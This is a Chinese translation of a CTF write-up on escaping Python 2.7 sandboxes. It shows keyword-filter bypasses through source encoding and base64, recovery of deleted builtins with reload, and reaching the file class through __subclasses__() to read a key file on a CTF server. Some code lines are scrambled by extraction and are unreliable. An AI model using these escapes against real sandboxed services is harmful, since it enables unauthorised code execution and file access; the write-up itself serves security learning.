Python沙箱逃逸
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。http://bobao.360.cn/learning/detail/3542.html
原文链接:http://blog.isis.poly.edu/ctf/exploitation%20techniques/2012/10/26/escaping-python-sandboxes/
前言
作为一个CTF爱好者,又是一个Bin选手,在国外各种受虐的同时,总是能学到不少的东西。最近,和师傅们在做国外的CTF题,做到一种Pwn题目,是需要选手在Python的沙箱达到逃逸的目的,获取flag。在谷歌的过程中,找到了一篇不错的博文。
正文
注意:这是为Python 2.7.3编写的。这些细节可能在其他版本的Python - 特别是Python3 - 有所不同!
尝试逃离沙箱总是一个有趣的挑战。Python沙箱也不例外。在静态语言中,这通常通过分析代码来查看是否调用某些函数,或者用确认验证的代码包装危险函数来完成。然而,这在动态语言(如Python)中有点更具挑战性。
沙盒的一个简单方法是扫描脚本的内容,以查找危险的特定关键字或函数,例如eval,exec,execfile和import。这可以很容易地通过编码我们的脚本来侧面攻击。PEP-0263,这里有更加详细的介绍。
但只要你有# coding:<encoding>
脚本的前两行之一,Python解释器将解释这个编码的整个脚本
1 | # coding: rot_13 |
显然,我们需要一种更好的思路来进行逃逸。但是这之前,我们需要了解一些背景知识。
背景知识
我们知道,dir
可以作为我们检Python对象的第一个工具。引动docs:“Without arguments, return the list of names in the current local scope. With an argument, attempt to return a list of valid attributes for that object.”,就是说,“ 没有参数,返回当前本地作用域中的名称列表。使用参数,尝试返回该对象的有效属性的列表。“
它并不声称是完整的,一个类可以定义一个__dir__
方法,但现在我们可以假设它是正确的。
我们经常使用的第二个功能是type
,简单来说,使用单个参数,它会给你一个对象的类型 - 这可以有助于理解什么是一旦你知道它的存在。再次,引用文档:“ 返回对象的类型。返回值是一个类型对象。“。
所以现在让我们开始戳。
当执行开始时,以下对象在本地作用域中(yay dir()!):
1 | dir() |
嗯,让我们看看Python语言参考: “一个模块对象有一个由字典对象实现的命名空间…属性引用被转换为这个字典中的查找,例如,m.x等同于m。dict [“x”]“`
现在,我们可以检查内置程序简单地通过运行dir(builtins) 该列表有点长。条目是所有内置类型和函数。
所以现在让我们重温前面的沙盒测试的字符串检查方法。也许你没有能力改变整个文件的编码。您仍然可以通过访问模块的底层dict,然后使用变量访问所需的函数来对单个函数调用的名称进行编码。所以让我们import os使用内置函数稍微狡猾的方式调用import__:首先获取base64版本的字符串”__import“和”os”:
1 | import base64 |
把它放在一起:
1 | 'X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64')) __builtins__.__dict__[ |
嗯,所以使用文本过滤到沙盒代码很明显。
也许我们可以采取另一种方法在过滤,基于使用builtins.dict__。因为__builtins.__dict__是一个代表我们的环境可用的所有内置函数的字典,如果我们修改其中一个条目,我们可以改变环境的可用内容。
例如,abs函数返回数字的绝对值:
1 | abs(-1) |
尝试攻击
现在,让我们做更多的操作
1 | 'abs'] = None __builtins__.__dict__[ |
该del语句删除一个对象的引用:
1 | del __builtins__.__dict__['abs'] |
我们刚刚删除了环境调用的能力abs!所以现在我们有另一种方法来处理Python沙盒 - 删除许多“危险”内置函数。
让我们做一个小的危险函数列表:
1 | del __builtins__.__dict__['__import__'] # __import__ is the function called by the import statement |
嗯,这看起来有点安全,对吧?
1 | import os |
等一下!
reload(module) 重新加载导入的模块,并执行代码 - 所以模块被导回到我们的命名空间。
1 | reload(__builtins__) |
我想我们必须将其添加到列表中。
1 | del __builtins__.__dict__['reload'] # they might reload __builtins__ ! |
好。所以现在我们有一个安全的方法,对吧?我们阻止了沙箱中的任何人使用危险的内置命令,并且我们可以通过不允许他们对整个文件进行编码和扫描内容来阻止他们使用eval关键字。希望我们删除所有危险的内置…
让我们从2012.hack.lu在他们的题目中,你需要读取一个文件,’./key’的内容。
他们首先通过删除引用来销毁打开文件的内置函数。然后它们允许您执行用户输入。看看他们的代码稍微修改的版本:
1 | def make_secure(): |
编码技巧不会工作 - 我们没有参考file或open在__builtins__。但是,也许我们可以参考挖出来file,或open从解释其他位置并使用它?
让我们深入一点
(对于这一部分,我需要对Ned Batchelder参考学习,我一年的夏天正在阅读他的博客,他有一个很好的eval写法,说明一个非常危险的语句,他在他的代码中通过这个方法)。
如前所述,type在对象上运行返回一个type object。例如:
1 | type( [1,2,3] ) |
现在,让我们开始检查一个元组的字段:
这些都是功能。但__class__有点有趣。它返回表示对象的类。
1 | type(().__class__) |
这进入元类和元类型详细信息。更多的内容都在,PEP 0253。让我们现在忽略,并深入一点。
根据文档,新式类有一些特殊的属性。具体来说,bases__它包含“基类,按它们在基类列表中出现的顺序” class.__subclasses(),并返回所有子类的列表。
让我们来看看我们的元组。
1 | ().__class__.__bases__ |
它直接从对象继承。我不知道还有什么:
1 | 0].__subclasses__() ().__class__.__bases__[ |
我们在这里有我们需要的一切!
然后我可以file用一些简单的行在列表中找到索引:
1 | all_classes = [] |
我们不能在挑战中使用这个代码(甚至重写为列表解析),因为它包括空格。但是由于file在索引40,我们可以硬编码。
1 | 0].__subclasses__()[40] ().__class__.__bases__[ |
一旦我们引用了文件,我们所需要做的就是创建一个文件对象并读取它:
1 | >> ().__class__.__bases__[0].__subclasses__()[40]("./key").read() |
所以解决题目我们需要,
1 | moshe@moshe-desktop:~$ netcat ctf.fluxfingers.net 2045 |
在旁注中,我们不需要在单个语句中执行 - exec在当前上下文中运行代码,因此通过将每个命令的输出存储在变量(除了a)之外,我们可以轻松地保持命令之间的状态。
1 | moshe@moshe-desktop:~$ netcat ctf.fluxfingers.net 2045 |
参考连接
- 另一个魔法可能是有用的:http : //www.reddit.com/r/Python/comments/hftnp/ask rpython恢复清除的全局/ c1v372r
- Ned Batchelder的博文:http : //nedbatchelder.com/blog/201206/eval really is_dangerous.html
后记
其实发现,国内的比赛和国外的比赛,有些赛事质量真的差很多,国内很多比赛都是为了出题而出题,相反,其实国外的比赛虽然很难,但是攻克的过程中,都能学到许多的姿势。